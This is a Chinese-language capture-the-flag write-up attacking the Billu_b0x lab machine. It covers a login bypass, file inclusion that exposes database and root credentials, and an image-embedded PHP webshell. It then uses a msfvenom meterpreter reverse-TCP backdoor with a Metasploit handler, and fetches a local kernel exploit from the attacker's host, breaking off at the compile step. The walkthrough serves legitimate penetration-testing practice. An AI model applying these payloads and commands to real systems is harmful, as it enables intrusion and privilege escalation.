靶机实战-Billu_creat_Files

zaibuchihuajia2025-02-28文章来源:SecHub网络安全社区


1、主机发现

命令上面不显示,下面是嗅探命令。
我们要攻击靶机的一个ip地址:192.168.31.153
2、端口扫描

查看到目标开放的有22,80端口。
3、端口详细信息扫描

4、80端口–http服务
访问主页:

只有用户名、密码和一个login按钮,其它任何地方都不能点击
尝试弱口令点击登录按钮,提示如下:

我这里实用的是万能密码,当然你也可以通过BP抓包,去进行账号密码爆破。----弱口令
4.1扫一下网站目录:

4.2针对这些目录一一查看找找看有没有什么漏洞
依次访问:
http://192.168.31.153/add

找到上传页面,可以尝试上传一句话木马文件:

点击upload没有任何显示,先pass,查看其它目录
http://192.168.31.153/c

http://192.168.31.153/cgi-bin

http://192.168.31.153/cmd

http://192.168.31.153/images/

http://192.168.31.153/in
这一页是php指针,我能能在这里面获得很多信息

http://192.168.31.153/index

主页
http://192.168.31.153/index.php 同上
http://192.168.31.153/panel 也是返回主页页面
http://192.168.31.153/server-status

http://192.168.31.153/show 空白页
http://192.168.31.153/test

这个file有点意思,猜测是文件包含,尝试文件包含: ----这里猜测可能存在文件包含


4.3什么都不显示?? 抓个包查看一下

右键选择change request method—切换post传参方式—然后发送到重发模块repeater


这里页面发现还是有现实结果的
有结果,在尝试包含主页/var/www/index.php:

然后再去包含这两个文件:/var/www/c.php

mysqli_connect,貌似是连接数据库的…,但刚才没扫到数据库登录页面,换大字典扫一下:

很多目录,现在我只需要查找可能是登录数据库的目录:
http://192.168.31.153/

用拿到的用户名密码尝试登录数据库:
// billu b0x_billu
登录成功



用户名密码?尝试登录一下:
//biLLu hEx_it

4.4登录成功,发现有两个功能:

点击add user,可以上传文件:

尝试上传一句话木马文件:1.php

4.5制作图片马上传:12306.jpg


准备一个php文件和一个jpg图片----创建图片马





上传成功,尝试用蚁剑连接:

http://192.168.31.153/uploaded_images/12306.jpg


连接失败…

换system一句话执行系统命令:GET方式

制作图片马,然后上传:

打开hackbar-----点击Execute


可以执行命令,那我直接写一个一句话php文件

查看写入的一句话文件:


用蚁剑成功连接:

拿到webshell

5、提权
查看phpmyadmin的默认的配置文件内容
phpmyadmin的默认的配置文件是:config.inc.php
可自行百度
bp抓包,修改请求方式:

拿到用户名密码:root roottoor
尝试远程连接ssh:

提示密码不对,试一下123456:


6、提权二
提权方式多多,可自行选择

用msfvenom生成一个php后门,利用蚁剑上传:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.125 -f raw > test.php


上传到蚁剑

开启msf配置好handler//监听

PHP
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.31.125


触发后门:

查看kali拿到shell:

转化为交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'

kali查找此系统漏洞,选择exp下载exp到靶机的/tmp目录下,并执行:
└─# searchsploit Ubuntu 12.04

└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html cd /var/www/html

开启apache服务
└─# service apache2 start
下载exp:
wegt http://192.168.31.125/37292.c

编译并执行:
gcc -pthread 37292.c -o exp -lcrypt